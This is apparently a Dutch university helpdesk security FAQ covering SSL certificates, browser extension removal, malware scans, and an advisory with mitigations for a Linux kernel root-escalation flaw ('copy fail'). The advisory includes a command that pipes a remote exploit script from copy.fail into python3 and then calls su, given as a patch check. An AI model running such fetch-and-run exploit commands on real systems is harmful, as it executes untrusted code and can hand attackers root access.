Veelgestelde vragen over beveiliging
Om je webserver te beveiligen met https moet je ervoor zorgen dat je correct werkende SSL certificaten hebt.
UGent medewerkers kunnen zelf een certificaat maken en laten ondertekenen. Een alternatief is het gebruiken van LetsEncrypt om certificaten aan te vragen en automatisch te vernieuwen.
Tegenwoordig hebben recente versies van webservers zoals Apache ingebouwde ondersteuning hiervoor. Het is dus niet nodig om b.v. certbot te gebruiken voor het verwerken van LetsEncrypt certificaten. Zie bijvoorbeeld deze tutorial. Op Windows kan je dit ook gebruiken.
Volg onderstaande instructies om schadelijke of onbekende browser extensies te verwijderen.
Google Chrome
- Open Chrome
- Klik op de drie puntjes (⋮) in de rechterbovenhoek
- Selecteer Extensies > Extensies beheren
- Zoek de extensie in de lijst en klik vervolgens op Verwijderen
Microsoft Edge
- Open Edge
- Klik op de drie puntjes (…) in de rechterbovenhoek
- Selecteer Extensies > Extensies beheren
- Zoek de extensie in de lijst en klik vervolgens op Verwijderen
Mozilla Firefox
- Open Firefox
- Klik op de menuknop (☰) in de rechterbovenhoek
- Selecteer Extensies en thema's en vervolgens Extensies
- Zoek de extensie in de lijst en klik op de drie puntjes (…) ernaast
- Klik in het menu op Verwijderen
Safari (macOS)
- Open Safari
- Kies in het Safari-menu in de menubalk de optie Instellingen (of Voorkeuren)
- Klik op Extensies
- Selecteer de extensie in de lijst en klik op de knop Verwijder installatie
Stel een nieuwe vraag op ICT HelpMe. Je kan ook bellen naar:
- 09 264 47 47 tijdens de werkuren (ICT Helpdesk) van 8u tot 18u
- 09 264 88 88 buiten de werkuren (PermanentieCentrum)
Lexicon
- Browser caching is een tijdelijke opslag op je computer waarin onderdelen van websites worden bewaard om ze sneller te laden bij een volgend bezoek.
- Cookies zijn kleine tekstbestandjes die websites op je computer of telefoon plaatsen om informatie over je bezoek op te slaan. Ze helpen websites jou te herkennen en je ervaring te personaliseren.
Hoe verwijderen?
De manier om je cache, cookies en geschiedenis te verwijderen is afhankelijk van de browser die je gebruikt:
- Typ in de zoekbalk onderaan "virus en bedreigingsbeveiliging".
- Open Virus en bedreigingsbeveiliging.
- Doe even eerst een "Snelle scan".
- Klik daarna op "Scanopties".
- Selecteer "Volledige scan" en daarna "Nu scannen".
Dit gaat langere tijd lopen maar je kan gerust verderwerken (mogelijks werkt de laptop wel iets trager door de scan in de achtergrond).
Status 2 30/04/2026 20u45
We kregen de vraag hoe men zeker kan zijn of de patch of mitigation acties geslaagd zijn. De documentatie op https://copy.fail/ beschrijft hoe je de exploit kan uitvoeren. Indien je hierbij een fout krijgt werkt de exploit niet en is je mitigation of patching gelukt. Voorbeeld:
user@laptop:~$ curl https://copy.fail/exp | python3 && su
Traceback (most recent call last):
File "<stdin>", line 9, in <module>
File "<stdin>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory
Status 1 30/04/2026 14u30
Er is een kritieke kwetsbaarheid vastgesteld in de Linux kernel, aangeduid met CVE-2026-31431 en gekend met de naam “copy fail”. Hiermee kunnen “root”-rechten verkregen worden op het systeem door het uitvoeren van een kort Python-script dat een kwetsbaarheid in de Linux Crypto API (AF_ALG) misbruikt.
- Bijna alle Linux-kernels sinds 2017 zijn kwetsbaar.
- Bevestigd kwetsbaar: Ubuntu, RHEL, Amazon Linux, SUSE, Debian en afgeleiden. Systemen waarbij meerdere gebruikers inloggen, CI/CD, containers, gedeelde hosts (denk aan Linux PCs voor studenten of voor rekentaken) en webservers met andere (nog niet gekende) kwetsbaarheden hebben een veel hoger risico.
Op dit moment zijn er voor de meeste distro’s nog geen patches beschikbaar. We verwachten deze in de loop van de komende dagen. Hou hiervoor de kanalen voor jouw distro in de gaten en patch zodra deze beschikbaar is.
Voor systemen die nog kernel-updates uitbrengen en die je kan upgraden, patch deze zo snel mogelijk. Voor systemen die “end of life” zijn is het nodig de mitigatie zoals hieronder vermeld toe te passen. Systemen met een hoger risico passen best ook de mitigatie toe zolang de kernel niet gepatched is.
Het gevaar bestaat dat een systeem dat nu niet gepatcht wordt in de toekomst via een minder kritieke kwetsbaarheid direct overgenomen kan worden. Vandaar dat ieder Linux-systeem zo snel mogelijk gepatcht moet worden.
Mitigatie
- Schakel indien mogelijk de algif_aead kernel-module uit. Zie https://copy.fail/#mitigation. De mitigatie kan systeem impact hebben.
- Voor systemen waar de module ingebouwd is in de kernel (o.a. RedHat) kan met de volgende boot parameter toevoegen en rebooten: initcall_blacklist=algif_aead_init
- Systemen die niet gepatched kunnen worden en waarvoor geen mitigatie kan voorzien worden dienen zo snel mogelijk gemeld te worden aan de helpdesk, zodat een risico-inschatting gemaakt kan worden en verdere acties bepaald kunnen worden.
Medewerkers en studenten vinden algemene informatie over IT-security op Beveiliging (ICT Helpdesk website).